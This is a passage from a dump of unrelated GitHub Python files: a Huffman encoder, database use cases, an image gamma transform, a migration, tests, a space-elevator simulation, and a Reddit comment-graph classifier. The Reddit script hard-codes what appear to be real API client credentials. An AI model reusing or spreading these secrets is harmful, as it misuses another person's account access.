open('bitcodes.dat', 'w') as bitData:\n treeData.write('Character Frequency Bit code values\\n')\n \n for key, val in self.bit_codes.items():\n treeData.write(f'{key} {frequency[key]} {val}\\n')\n bitData.write(f'{key} {val}\\n') \n \n # for visiualizing the tree we traverse tree and add char,frequency values to the list\n self.traverse_tree(root) \n \n # write list of chars and frequency values to visualize.dat for visualizing tree later\n with open(\"visualize.dat\", \"w\") as visualData:\n for i in range(len(self.char_freq)):\n for j in range(len(self.char_freq[i])):\n visualData.write(str(self.char_freq[i][j])+' ')\n visualData.write('\\n')\n \n def encode(self, original_text, bitcodes):\n self.bit_codes = self.get_dictionary_from_file(bitcodes)\n \n encoded_text = self.get_encoded_text(original_text)\n \n padded_encoded_text = self.padding_encoded_text(encoded_text)\n \n byte_array = self.convert_bits(padded_encoded_text)\n\n with open('encoded-text.bin', 'wb') as encoded_message:\n encoded_message.write(bytes(byte_array))\n\n def decode(self, bitcodes, bin_file):\n self.bit_codes = {val:key for key, val in self.get_dictionary_from_file(bitcodes).items()}\n\n with open(bin_file, 'rb') as binary_file, open('decoded-text.txt', 'w') as output_file:\n bits_string = \"\"\n \n while True:\n byte = binary_file.read(1)\n if len(byte) <= 0:\n break\n bits = f'{ord(byte):b}'.rjust(8, \"0\")\n bits_string += bits\n \n decoded_text = self.decode_text(bits_string)\n \n output_file.write(decoded_text)\n \n def visualize(self, bitcodes, visualData):\n \n self.bit_codes = self.get_dictionary_from_file(bitcodes)\n\n dot = Digraph(comment='Huffman Tree', edge_attr={'arrowhead':'none'})\n \n # get character,frequency as list of lists if characters exists otherwise only frequencies\n with open(visualData) as visual:\n \n for line in visual:\n if line != '\\n':\n line = line.rstrip()\n if len(line.split()) == 2:\n self.char_freq.append([line[0:line.index(' ')], int(line[line.index(' ')+1:])])\n else:\n if line[0] == ' ':\n self.char_freq.append([line[0], int(line[line.index(' ')+1:])])\n else:\n self.char_freq.append([int(line)])\n else:\n first_line = line\n second_line = visual.readline().strip()\n self.char_freq.append([first_line, int(second_line)])\n\n # index to keep track of nodes\n start = 0\n i = 0\n \n while True:\n # the last node or the root in the list\n if len(self.char_freq) == 1:\n break\n # by iterating list of lists, we find frequencies first since they are parents of leaf nodes and further sum of frequencies\n # only frequencies are just one value and value increases as sum of frequencies of children nodes\n if len(self.char_freq[i]) == 1:\n \n # this creates leaf nodes fist and when iteration is in upper level, this nodes will be in the correct position as a leaf child node\n if len(self.char_freq[i-2]) != 1 and len(self.char_freq[i-1]) != 1:\n for element in range(start, i-2):\n dot.node(self.bit_codes[self.char_freq[element][0]], \\\n f'{self.char_freq[element]}/{self.bit_codes[self.char_freq[element][0]]}')\n \n # parent node's reference\n p = str(self.char_freq[i][0]) + str(self.char_freq[i-1][0][-1])\n # frequency value of parent node\n d = str(self.char_freq[i][0])\n\n # create a node as d being label, when creating other nodes p will be referenced\n dot.node(p, d) \n # replace the current node with parent's reference\n self.char_freq[i] = [p] \n # case for when left child is frequency value and right child is leaf node\n # all leaf nodes are in this format ['character','frequency']/bitcode-value, other nodes are just frequency values\n if len(self.char_freq[i-2]) == 1 and len(self.char_freq[i-1]) != 1:\n dot.edge(p, str(self.char_freq[i-2][0]))\n dot.node(self.bit_codes[self.char_freq[i-1][0]], f'{self.char_freq[i-1]}/{self.bit_codes[self.char_freq[i-1][0]]}')\n dot.edge(p, self.bit_codes[self.char_freq[i-1][0]])\n # case for when left child is leaf node and right child is frequency value\n elif len(self.char_freq[i-2]) != 1 and len(self.char_freq[i-1]) == 1:\n dot.node(self.bit_codes[self.char_freq[i-2][0]], f'{self.char_freq[i-2]}/{self.bit_codes[self.char_freq[i-2][0]]}')\n dot.edge(p, self.bit_codes[self.char_freq[i-2][0]])\n dot.edge(p, str(self.char_freq[i-1][0]))\n # case when left and right children are frequency values\n elif len(self.char_freq[i-2]) == 1 and len(self.char_freq[i-1]) == 1:\n # creating edges between current node and left, right children which were firstly parent nodes of leaf children\n dot.edge(p, str(self.char_freq[i-2][0]))\n dot.edge(p, str(self.char_freq[i-1][0]))\n # case when left and right children are leaf nodes\n else:\n dot.node(self.bit_codes[self.char_freq[i-2][0]], f'{self.char_freq[i-2]}/{self.bit_codes[self.char_freq[i-2][0]]}')\n dot.node(self.bit_codes[self.char_freq[i-1][0]], f'{self.char_freq[i-1]}/{self.bit_codes[self.char_freq[i-1][0]]}')\n dot.edge(p, self.bit_codes[self.char_freq[i-2][0]])\n dot.edge(p, self.bit_codes[self.char_freq[i-1][0]])\n # remove current nodes \n self.char_freq = self.char_freq[:i-2] + self.char_freq[i:] \n start = i - 1\n i -= 2\n \n i += 1\n # render file and output it \n dot.render('huffman-tree.dot', view=True) \n \n# function to determine input format \n# either accepts file or word/sentence as list of strings\ndef determine_input_format():\n if sys.argv[2][-4:] == '.txt' and sys.argv[2] == sys.argv[-1]:\n text_file = sys.argv[2]\n input_format = '.txt'\n else:\n text_file = sys.argv[2:]\n input_format = 'other'\n \n return determine_frequency(text_file, input_format)\n\n# function to count frequencies of each character\n# in a file or word/sentence \n# and write to frequency.txt\ndef determine_frequency(text_file, input_format):\n frequency_dict = {}\n \n # find frequencies of chars in file and add it to dictionary\n if input_format == '.txt':\n with open(text_file) as f:\n for line in f:\n for char in line:\n if char in frequency_dict:\n frequency_dict[char] += 1\n else:\n frequency_dict[char] = 1\n \n # find frequencies of chars in words/sentence and add it to dictionary\n elif input_format == 'other':\n for i in range(len(text_file)): \n for j in range(len(text_file[i])):\n if text_file[i][j] in frequency_dict:\n frequency_dict[text_file[i][j]] += 1\n else:\n frequency_dict[text_file[i][j]] = 1\n # case handling for space character in text from command line\n if ' ' in frequency_dict:\n frequency_dict[' '] += 1\n else:\n frequency_dict[' '] = 1\n # add new line character to text from command line \n frequency_dict['\\n'] = 1\n \n # write text content that is given from command line to the file\n with open('sample.txt', 'w') as f:\n for i in range(len(text_file)): \n for j in range(len(text_file[i])):\n f.write(text_file[i][j])\n f.write(' ')\n f.write('\\n')\n\n # write frequencies with characters to the file\n with open('frequency.txt', 'w') as f:\n for key, val in frequency_dict.items():\n f.write(f'{key} {val} \\n') if key == '\\n' else f.write(f'{key} {val}\\n')\n \n return input_format \n \ndef command_handler():\n # -generate command for determining frequency of characters \n if sys.argv[1] == '-generate':\n # no text or file given\n if sys.argv[1] == sys.argv[-1]:\n print('Enter a text or file in command line')\n sys.exit(0)\n input_format = determine_input_format()\n # check whether original text is derived from file or command line\n print(f'Original text is in {sys.argv[2]}') if input_format == '.txt' else \\\n print('Original text is in sample.txt')\n \n print('Generated character frequencies for Huffman code')\n print('Wrote output to frequency.txt')\n \n # -buildtree command for building tree with characters and frequency\n # also building tree with characters and its bit values determined by huffman coding\n elif sys.argv[1] == '-buildtree':\n text_file = sys.argv[2]\n if os.path.exists(text_file):\n huffman = Huffman(text_file)\n huffman.buildTree()\n print('Wrote output to tree.dat and bitcodes.dat. visualize.dat is also generated for visualizing a tree!')\n else:\n print(f\"Can't buld a tree. {text_file} file doesn't exist!\")\n \n # -encode command for encoding text or file and returning binary file\n elif sys.argv[1] == '-encode':\n original_file = sys.argv[2]\n # bitcodes.dat generated from -buildtree command\n bitcodes = sys.argv[3]\n if os.path.exists(bitcodes):\n huffman = Huffman()\n huffman.encode(original_file, bitcodes)\n print('Wrote output to encoded-text.bin')\n else:\n print(f\"Can't encode a file. {bitcodes} file doesn't exist!\")\n \n # -decode command for decoding binary file and returning original text\n elif sys.argv[1] == '-decode':\n bitcodes = sys.argv[2]\n # check whether binary file generated from -encode exists\n bin_file = sys.argv[3]\n if os.path.exists(bin_file):\n huffman = Huffman()\n huffman.decode(bitcodes, bin_file)\n print('Wrote output to decoded-text.txt')\n else:\n print(f\"Can't decode a file. {bin_file} file doesn't exist!\")\n \n # -visualize command for visualizing huffman tree containing characters and frequency as leaf nodes together with their bit code values\n elif sys.argv[1] == '-visualize':\n bitcodes, visualData = sys.argv[2], sys.argv[3]\n # check whether visualData generated from -buildtree exists\n if os.path.exists(visualData):\n huffman = Huffman()\n huffman.visualize(bitcodes, visualData)\n print('Wrote output to huffman-tree.dot. View visualization in huffman-tree.dot.pdf')\n else:\n print(f\"Can't visualize a tree. {visualData} file doesn't exist!\")\n\ncommand_handler()\n","repo_name":"KTural/Huffman-Tree","sub_path":"huffman.py","file_name":"huffman.py","file_ext":"py","file_size_in_byte":19499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20090024225","text":"from typing import List, Set\nfrom uuid import uuid1\n\nfrom src.interfaces import (\n AgeGroupInterface,\n DiseaseGroupInterface,\n MobilityGroupInterface,\n PopulationInterface,\n QuarantineGroupInterface,\n SusceptibilityGroupInterface,\n VulnerabilityGroupInterface\n)\nfrom src.models.db import Configuration, Population\nfrom src.models.general import Groups\nfrom src.models.route_models import UpdateVariable\nfrom src.utils import BsonObject\n\n\nclass ValidatePopulationDefault:\n\n @classmethod\n def handle(cls, configuration: Configuration) -> None:\n \"\"\"\n Validate if exist a population in a configuration, if it didn't exist it\n will create a population for a configuration.\n\n :param configuration: Configuration associated to the population.\n \"\"\"\n population = PopulationInterface.find_one_by_conf(configuration)\n if not population:\n population = Population(\n identifier=uuid1(),\n configuration=configuration,\n allowed_configuration={Groups.AGE.value},\n allowed_variables={\n unit.value for unit in Groups if\n unit != Groups.AGE\n },\n extra_data={}\n )\n population.save()\n\n\nclass FindAllowedVariables:\n\n @classmethod\n def handle(cls, population: Population, variable: Set[Groups]) -> List:\n \"\"\"\n Find all allowed variables to update in a population and return its\n values.\n\n :param population: Population specification to update information.\n :param variable: Input information to find\n \"\"\"\n current_values = population.values\n values = [\n unit.value for unit in Groups\n if unit.value in current_values.keys()\n ]\n # Add default value to the list\n values.insert(0, Groups.AGE.value)\n\n if not variable:\n variable = {}\n allowed_variables = []\n for i in values:\n if Groups(i) not in variable:\n allowed_variables.append(i)\n return allowed_variables\n\n\nclass UpdatePopulationValues:\n\n @classmethod\n def handle(cls, population: Population, variables: UpdateVariable):\n \"\"\"\n Update population variable according to variable input.\n\n :param population: Population specification to update information.\n :param variables: Input information to update.\n \"\"\"\n variables_dict = variables.dict()\n current_values = population.values\n current_values.update(\n {variables_dict.get(\"variable\"): variables_dict.get(\"values\")}\n )\n\n allowed_configuration = population.allowed_configuration\n if variables.variable not in allowed_configuration:\n allowed_configuration.append(variables.variable)\n\n allowed_variables = population.allowed_variables\n if variables.variable in allowed_variables:\n allowed_variables.remove(variables.variable)\n\n extra_data = population.extra_data\n extra_data.chains.update({variables.variable: variables.chain})\n\n population.update(\n values=current_values,\n allowed_configuration=allowed_configuration,\n allowed_variables=allowed_variables,\n extra_data=extra_data\n )\n population.reload()\n\n\nclass DeletePopulationValues:\n\n @classmethod\n def handle(cls, population: Population, variable: Groups) -> bool:\n \"\"\"\n Delete population values from specific configuration and delete its\n chain\n\n :param population: population to modify values.\n :param variable: variable to delete information in the values.\n \"\"\"\n if not cls._validate_chain(population, variable):\n return False\n population_values = population.values\n if variable.value in population_values.keys():\n del population_values[variable.value]\n\n configuration = population.allowed_configuration\n variables = population.allowed_variables\n if variable.value not in variables:\n variables.append(variable.value)\n if variable.value in configuration:\n configuration.remove(variable.value)\n\n extra_data = population.extra_data\n if variable.value in extra_data.chains:\n del extra_data.chains[variable.value]\n\n population.update(\n values=population_values,\n allowed_configuration=configuration,\n allowed_variables=variables,\n extra_data=extra_data\n )\n\n return True\n\n @classmethod\n def _validate_chain(cls, population: Population, variable: Groups) -> bool:\n chains = population.extra_data.chains\n variable_chain = chains.get(variable.value)\n\n all_values = []\n [all_values.extend(value) for value in population.extra_data.chains.values()]\n if variable.value in list(set(all_values)):\n return False\n return True\n\n\nclass FindVariableResults:\n\n @classmethod\n def handle(cls, configuration: Configuration, variable: Groups) -> dict:\n \"\"\"\n Find specific configuration from simulation according to specific\n variable, return all data from each interface.\n\n :param configuration: configuration associated to find variable in the\n interface\n :param variable: type of variable to find\n \"\"\"\n interface_dict = {\n Groups.AGE: AgeGroupInterface,\n Groups.MOBILITY: MobilityGroupInterface,\n Groups.SUSCEPTIBILITY: SusceptibilityGroupInterface,\n Groups.VULNERABILITY: VulnerabilityGroupInterface,\n Groups.DISEASE: DiseaseGroupInterface,\n Groups.QUARANTINE: QuarantineGroupInterface,\n }\n interface = interface_dict.get(variable)\n if interface:\n return BsonObject.dict(interface.find_all_by_conf(configuration))\n return dict()\n\n\nclass FindVariablesConfigured:\n\n @classmethod\n def handle(cls, population: Population) -> list:\n \"\"\"\n Find all variables configured in population configuration, except age\n configuration and return an array variables.\n\n :param population: population configuration to find variables.\n \"\"\"\n variables_configured = list(set(population.allowed_configuration))\n variables_configured.remove(\"age\")\n return variables_configured\n\n\nclass FindPopulationData:\n\n @classmethod\n def handle(cls, population: Population, variable: Groups) -> dict:\n \"\"\"\n Find values saved for each variable population configured with its\n values and chain.\n\n :param population: Reference to find population values.\n :param variable: value to find current values in a population.\n :return: dictionary with values for each variable.\n \"\"\"\n is_allowed = variable.value not in population.allowed_configuration\n if variable == Groups.AGE or is_allowed:\n return {}\n chain = population.extra_data.chains.get(variable.value)\n values = population.values.get(variable.value)\n\n return cls._map_values(chain, values)\n\n @classmethod\n def _map_values(cls, chain: List[str], values: dict) -> dict:\n return {\n 'chain': chain,\n 'values': cls._rec_data(values)\n }\n\n @classmethod\n def _rec_data(cls, values: dict) -> List:\n list_values = []\n for k, v in values.items():\n if isinstance(v, dict):\n list_values.append(\n {'name': k, 'value': None, 'children': cls._rec_data(v)}\n )\n else:\n list_values.append({'name': k, 'value': v})\n return list_values\n\n","repo_name":"fenfisdi/cdslab_agents_config_api","sub_path":"src/use_case/population_use_case.py","file_name":"population_use_case.py","file_ext":"py","file_size_in_byte":7826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36548923682","text":"#!/user/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n图像归一化后得到图像I(r,c),伽马变换就是O(r,c)=I(r,c)^γ,0<=r<H,0<=c<W,\nγ=1,图像不变,。如果图像整体或者感兴趣区域较暗,令0<γ<1可以增强对比度;如果较亮,则令γ>1,降低对比度。\n实质上是对图像矩阵中的每一个值进行幂运算。\n\"\"\"\nimport numpy as np\nI=np.array([[1,2],[3,4]])\n# O = np.power(I,2)\n# print(O)\n\nimport cv2\n# image = cv2.imread('../Img/1685800379512.jpg') # gamma=0.5\nimage = cv2.imread('../Img/1685795920851.jpg') # gamma=0.3\n# image = cv2.imread('../Img/26.jpg')\n# image = cv2.imread('../Img/001.jpg')\n# image = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)\n# 图像归一化\nf1 = image/255.0\n# 伽马变换\ngamma = 0.3\nO= np.power(f1,gamma)\ncv2.imshow('I',image)\ncv2.imshow('O',O)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","repo_name":"tanzlyn/OpenCV-Digital-Image-Processing","sub_path":"OpenCV_Project/Opencv_Image_Processing/contrast_enhancement/Gamma transform.py","file_name":"Gamma transform.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6048060089","text":"from scrapingtools import get_all_global_links\r\n\r\n#left off here: need to make sure we're getting links correctly; test get_all_links local and global\r\n# versions against each other and manually inspect links inside small webpages\r\n\r\n\r\nurl = \"https://stackoverflow.com/questions/19168220/scrape-internal-links-with-beautiful-soup\"\r\nurl = \"https://riverbend.appfolio.com/connect/users/sign_in\"\r\nurl = \"https://en.wikipedia.org/wiki/Affirmative_conclusion_from_a_negative_premise\"\r\nurl = \"https://github.com/Matt-Gracz?tab=repositories\"\r\n#raw_html = simple_get(url)\r\n#html = parse_raw_html(raw_html)\r\n#links = (html)\r\n#x = [print(link) for link in links if str(link).startswith('/')]\r\n\r\nlocal_links = get_all_global_links(url)\r\nx = [print(link) for link in local_links]\r\n\r\n\r\n","repo_name":"Matt-Gracz/SLEProto","sub_path":"PythonApplication1/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69914524970","text":"from flask_login import UserMixin\n\n\nclass User(UserMixin):\n\n def __init__(self, user: dict):\n self.username = user['name']\n self.pwd = user['password']\n self.user_id = user['id']\n\n def __repr__(self):\n return '<User %r>' % self.username\n\n def get_id(self):\n return self.user_id\n\n @staticmethod\n def get_user_from_name(name):\n from dataweb.user_list import fetch_user\n user = fetch_user(property='name', value=name)\n if user is not None:\n return User(user)\n else:\n return None\n\n @staticmethod\n def get_user_from_id(user_id):\n from dataweb.user_list import fetch_user\n user = fetch_user(property='id', value=user_id)\n if user is not None:\n return User(user)\n else:\n return None\n","repo_name":"calabozo/flask_login","sub_path":"dataweb/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19890084544","text":"import math\npi = math.pi\n\nimport matplotlib.pyplot as plt\n\nfrom material import *\nfrom elevator import *\n\nh_elev = 35786000*1.5\nw_max = 100000\nw_min = 10000\n\ndef quadratic_profile(h):\n global h_elev\n hmax = h_elev\n x = hmax - h\n y_coeff = ((w_max - w_min)/h_elev**2)\n y = y_coeff * x**2 + w_min # 10km at tip, 100km at sea level\n A = pi * y**2\n return A\n\ndef linear_profile(h):\n global h_elev\n hmax = h_elev\n x = hmax - h\n y_coeff = (w_max - w_min)/h_elev\n y = y_coeff * x + w_min # 10km at tip, 100km at sea level\n A = pi * y**2\n return A\n\ndef constant_profile(h):\n y = w_min\n A = pi * y**2\n return A\n\ndef main():\n SS = SS304L()\n \n # angular velocity of Earth is calculated with (2pi / sideral day length)\n earth = celestial_body(5.972 * 10**24, 6371000, 7.292*10**(-5))\n\n # geostationary orbit for earth is 35786 km\n # this lift reaches twice the height\n Atlantic_Lift = elevator(earth, h_elev, quadratic_profile, SS)\n\n hs = []\n ys = []\n stresses = []\n gravitys = []\n inertials = []\n total_forces = []\n total_accels = []\n for h in range(0, int(h_elev), 100000):\n hs.append(h/1000)\n ys.append((Atlantic_Lift.A(h)/pi)**(0.5)/1000)\n stresses.append(Atlantic_Lift.get_stress_at(h)/10**9)\n gravitys.append(Atlantic_Lift.get_gravitational_pull(h-100000, h)/10**9)\n inertials.append(Atlantic_Lift.get_inertial_pull(h-100000, h)/10**9)\n total_forces.append((Atlantic_Lift.get_inertial_pull(h-100000, h) - Atlantic_Lift.get_gravitational_pull(h-100000, h))/10**9)\n total_accels.append((Atlantic_Lift.get_inertial_pull(h-100000, h) - Atlantic_Lift.get_gravitational_pull(h-100000, h)) / Atlantic_Lift.get_mass_between(h-100000, h))\n\n _, ax = plt.subplots()\n plt.plot(ys, hs)\n plt.grid()\n plt.xlabel(\"Tower Radius (km)\")\n plt.ylabel(\"Tower Height (km)\")\n plt.show()\n\n plt.plot(hs, stresses)\n plt.grid()\n plt.xlabel(\"Tower Position (km)\")\n plt.ylabel(\"Stress (GPa)\")\n plt.show()\n\n plt.plot(hs, gravitys)\n plt.grid()\n plt.xlabel(\"Tower Position (km)\")\n plt.ylabel(\"Gravity Force About Position (GN)\")\n plt.show()\n\n plt.plot(hs, inertials)\n plt.grid()\n plt.xlabel(\"Tower Position (km)\")\n plt.ylabel(\"Inertia-induced Force About Position (GN)\")\n plt.show()\n\n plt.plot(hs, total_forces)\n plt.grid()\n plt.xlabel(\"Tower Position (km)\")\n plt.ylabel(\"Net Force About Position (GN)\")\n plt.show()\n\n plt.plot(hs, total_accels)\n plt.grid()\n plt.xlabel(\"Tower Position (km)\")\n plt.ylabel(\"Net Acceleration About Position (GN)\")\n plt.show()\n\nmain()\n","repo_name":"arda-guler/SpaceElevator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2663,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"9274766237","text":"from alembic import op\n\n\nrevision = '2b5eb14b042e'\ndown_revision = '23f172a581d1'\n\n\ndef upgrade():\n op.drop_constraint('issues_repo_id_fkey', 'issues', type_='foreignkey')\n op.create_foreign_key(\n 'fk_issues_repo_id_repos',\n 'issues', 'repos',\n ['repo_id'], ['github_repo_id'],\n )\n op.drop_constraint(\n 'pull_requests_repo_id_fkey', 'pull_requests', type_='foreignkey'\n )\n op.create_foreign_key(\n 'fk_pull_requests_repo_id_repos',\n 'pull_requests', 'repos',\n ['repo_id'], ['github_repo_id'],\n )\n\n\ndef downgrade():\n op.drop_constraint(\n 'fk_pull_requests_repo_id_repos', 'pull_requests', type_='foreignkey'\n )\n op.create_foreign_key(\n 'pull_requests_repo_id_fkey',\n 'pull_requests', 'repos',\n ['repo_id'], ['id'],\n )\n op.drop_constraint('fk_issues_repo_id_repos', 'issues', type_='foreignkey')\n op.create_foreign_key(\n 'issues_repo_id_fkey',\n 'issues', 'repos',\n ['repo_id'], ['id'],\n )\n","repo_name":"DataDog/gello","sub_path":"migrations/versions/2b5eb14b042e_update_foreign_key_constraints_on_pull_.py","file_name":"2b5eb14b042e_update_foreign_key_constraints_on_pull_.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"53"} +{"seq_id":"31541273519","text":"import unittest\nimport fwim\n\nclass TestBasicWordMatcher(unittest.TestCase):\n def setUp(self):\n self.matcher = fwim.BasicWordMatcher()\n\n def test_big(self):\n words = []\n ifile = open('/usr/share/dict/words')\n for w in ifile:\n w = w.strip()\n if not w.endswith(\"'s\") and len(w) > 2:\n words.append(w)\n if len(words) >= 1000:\n break\n ifile.close()\n \n for w in words:\n self.matcher.add_word(w)\n \n for w in words[:50]:\n (match, penalty) = self.matcher.find_closest(w)\n self.assertEqual(match, w)\n \nif __name__ == '__main__':\n unittest.main()\n","repo_name":"rickd/Find-What-I-Mean","sub_path":"fwim_test_slow.py","file_name":"fwim_test_slow.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"70889201767","text":"from montag.domain.entities import Provider\nfrom montag.use_cases.fetch_playlists import FetchPlaylists\nfrom montag.use_cases.support import Failure, Success\nfrom tests import factory\n\n\ndef test_fetch_playlists(repos, spotify_repo):\n expected_playlists = factory.playlists(2)\n spotify_repo.find_playlists.return_value = expected_playlists\n\n response = FetchPlaylists(repos).execute(Provider.SPOTIFY)\n\n assert response == Success(expected_playlists)\n\n\ndef test_error_handling_with_unexpected_errors(repos, spotify_repo):\n error = ValueError(\"some message\")\n spotify_repo.find_playlists.side_effect = error\n\n response = FetchPlaylists(repos).execute(Provider.SPOTIFY)\n\n assert response == Failure(\"some message\", error)\n","repo_name":"eeng/montag","sub_path":"tests/use_cases/test_fetch_playlists.py","file_name":"test_fetch_playlists.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33529075922","text":"'''\r\nEscribir un programa que pregunte el nombre del usuario en la consola y un \r\nnúmero entero e imprima por pantalla en líneas distintas el nombre del usuario \r\ntantas veces como el número introducido.\r\n\r\n'''\r\nnombre = str (input(\"Introduce tu nombre: \"))\r\nveces = int (input (\"Introduce un número entero: \"))\r\nprint (veces*(nombre+\"\\n\")) #multiplico las veces por linea que quiero (nombre + cambio de línea)\r\n\r\n","repo_name":"Tavial/cursophyton","sub_path":"ALFdatosSimples/ejercicio04.py","file_name":"ejercicio04.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"41774964221","text":"import subprocess\nimport os.path\n\nclass PdfToText:\n def __init__(self, infilepath, pages, outdir):\n \"\"\"\n wrapper around 'pdftotext' to extract the text from the pdf\n \"\"\"\n self.infilepath = infilepath\n self.pages = pages\n self.outdir = outdir \n self.cmd = \"pdftotext\"\n if not os.path.exists(self.outdir):\n os.makedirs(self.outdir)\n\n def dumpPages(self): \n \"\"\"\n dumps the content of the pdf in a single file, to check whether there are significant number of character to verify if it's the strcutured or not\n \"\"\"\n filename = os.path.split(self.infilepath)[1].split(\".\")[0] \n self.dumpedTextFilepath = os.path.join(self.outdir, filename + \".txt\")\n cmdOutput = subprocess.call([self.cmd, self.infilepath, self.dumpedTextFilepath])\n\n def extractPage(self, page):\n outputFileName = os.path.join(self.outdir, str(page) + \".txt\")\n cmdOutput = subprocess.call([self.cmd, \"-f\", str(page), \"-l\", str(page), self.infilepath, outputFileName])\n\n def extractPages(self):\n \"\"\"\n unlike dumppages, it extracts the content of every page in each file, and converts newline to linebreak\n \"\"\"\n for page in range(1, self.pages+1):\n self.extractPage(page)\n outputFileName = os.path.join(self.outdir, str(page) + \".txt\")\n with open(outputFileName, 'r') as infile:\n content = infile.read() \n with open(outputFileName, 'w') as outfile:\n outfile.write(self.nl2br(content))\n\n def nl2br(self, s):\n return '<br />\\n'.join(s.split('\\n'))\n\n\n\n","repo_name":"anjesh/pdf-processor","sub_path":"pdftools/PdfToText.py","file_name":"PdfToText.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"74077023529","text":"import praw\r\nimport matplotlib.pyplot as plt\r\nimport networkx as nx\r\nfrom karateclub import Node2Vec\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import LabelEncoder\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.metrics import precision_score, recall_score, f1_score\r\nimport streamlit as st\r\n\r\nreddit = praw.Reddit(\r\n client_id='aaqo7P5fUXCJ1vvEHr_zXQ',\r\n client_secret='ATuvKXql-pzU6-7mqb-lqfuEs--J8w',\r\n user_agent='Robert, Andrada, IC project 1.0'\r\n)\r\n\r\n# Define the subreddit and create the graph\r\nsubreddit_name = 'Romania'\r\n\r\n@st.cache_data()\r\ndef mainGraph():\r\n \r\n graph = nx.Graph()\r\n\r\n subreddit = reddit.subreddit(subreddit_name)\r\n for submission in subreddit.hot(limit=5): # Adjust the limit as per your needs\r\n # Add submission as a node in the graph\r\n graph.add_node(submission.id, text=submission.title, type='submission')\r\n # Connect submission nodes with author nodes if author information is available\r\n if submission.author is not None:\r\n graph.add_edge(submission.id, submission.author.name, type='author')\r\n # Collect comments and connect them to their parent submissions or authors\r\n submission.comments.replace_more(limit=None)\r\n for comment in submission.comments.list():\r\n graph.add_node(comment.id, text=comment.body, type='comment')\r\n # Connect comments with author nodes if author information is available\r\n if comment.author is not None:\r\n graph.add_edge(comment.id, comment.author.name, type='author')\r\n if comment.parent_id.startswith('t3_'): # Parent is a submission\r\n graph.add_edge(comment.id, comment.parent_id, type='comment_to_submission')\r\n else: # Parent is another comment\r\n graph.add_edge(comment.id, comment.parent_id[3:], type='comment_to_comment')\r\n\r\n #graph = load('graph_cache.joblib') # can use this for cached graphs\r\n\r\n # Create a new graph with relabeled nodes\r\n relabeled_graph = nx.convert_node_labels_to_integers(graph, first_label=0)\r\n\r\n # Create a Node2Vec model\r\n model = Node2Vec(dimensions=128)\r\n\r\n # Fit the model to the relabeled graph\r\n model.fit(relabeled_graph)\r\n\r\n # Get the computed node embeddings\r\n node_embeddings = model.get_embedding()\r\n\r\n # Manually assign labels based on node type\r\n node_labels = {}\r\n for node in graph.nodes:\r\n node_type = graph.nodes[node].get('type')\r\n if node_type == 'comment':\r\n node_labels[node] = 'interaction'\r\n else:\r\n node_labels[node] = 'non_interaction'\r\n\r\n # Convert node labels to numerical values\r\n label_encoder = LabelEncoder()\r\n encoded_node_labels = label_encoder.fit_transform(list(node_labels.values()))\r\n\r\n scaler = StandardScaler()\r\n node_embeddings_scaled = scaler.fit_transform(node_embeddings)\r\n\r\n # Split the data into training and testing sets\r\n X_train_node, X_test_node, y_train, y_test = train_test_split(node_embeddings_scaled, encoded_node_labels, test_size=0.2, random_state=42)\r\n\r\n # Create and train the logistic regression model for nodes\r\n logreg_node = LogisticRegression(max_iter=500)\r\n logreg_node.fit(X_train_node, y_train)\r\n\r\n # Calculate accuracy\r\n accuracy = logreg_node.score(X_test_node, y_test)\r\n\r\n # Calculate precision\r\n precision = precision_score(y_test, logreg_node.predict(X_test_node))\r\n\r\n # Calculate recall\r\n recall = recall_score(y_test, logreg_node.predict(X_test_node))\r\n\r\n # Calculate F1 score\r\n f1 = f1_score(y_test, logreg_node.predict(X_test_node))\r\n\r\n print(\"Accuracy: \", accuracy)\r\n print(\"Precision:\", precision)\r\n print(\"Recall:\", recall)\r\n print(\"F1 Score:\", f1)\r\n\r\n return logreg_node\r\n\r\n@st.cache_data()\r\n# Create a function to create a graph from a post URL\r\ndef create_graph_from_post(url):\r\n graph = nx.Graph()\r\n submission = reddit.submission(url=url)\r\n # Add submission as a node in the graph\r\n graph.add_node(submission.id, text=submission.title, type='submission')\r\n # Connect submission nodes with author nodes if author information is available\r\n if submission.author is not None:\r\n graph.add_edge(submission.id, submission.author.name, type='author')\r\n # Collect comments and connect them to their parent submissions or authors\r\n submission.comments.replace_more(limit=None)\r\n for comment in submission.comments.list():\r\n graph.add_node(comment.id, text=comment.body, type='comment')\r\n # Connect comments with author nodes if author information is available\r\n if comment.author is not None:\r\n graph.add_edge(comment.id, comment.author.name, type='author')\r\n if comment.parent_id.startswith('t3_'): # Parent is a submission\r\n graph.add_edge(comment.id, comment.parent_id, type='comment_to_submission')\r\n else: # Parent is another comment\r\n graph.add_edge(comment.id, comment.parent_id[3:], type='comment_to_comment')\r\n # Reindex the nodes in ascending 